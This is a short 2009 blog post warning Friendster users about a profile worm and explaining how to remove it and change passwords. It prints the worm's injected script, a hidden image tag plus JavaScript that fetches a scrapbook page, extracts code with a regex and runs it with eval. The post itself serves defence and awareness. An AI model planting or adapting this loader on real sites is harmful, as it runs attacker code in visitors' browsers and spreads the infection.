Saturday, January 10, 2009

WARNING: Friendster Worm

new friendster worm

if you all see the code below(in red) inside your friendster profiles

under "edit profiles", click on the tap "customize", under

Add Media

<img id="friendster.com" width="0"><script>

httprequest= window.XMLHttpRequest? new XMLHttpRequest():new ActiveXObject



("Msxml2.XMLHTTP");

libid="37656241";

httprequest.open( 'GET', 'http://www.friendster.com/scrapview.php?uid='+libid, false);

httprequest.send(null);

var myregexp = /\/\/([^\$]+)/;

match = myregexp.exec(httprequest.responseText);

result = (match != null && match.length > 1)?match[1]:"";

eval(result);

__main();

</script>

please do the following


If you saw that code in your profile, erase/remove it immediately.

First thing to do is remove that code in your media box, then delete your temporary internet files on IE/clear private data on Firefox.
Second is you need to change your password immediately.
And Last you need to generate your codes again.

No comments: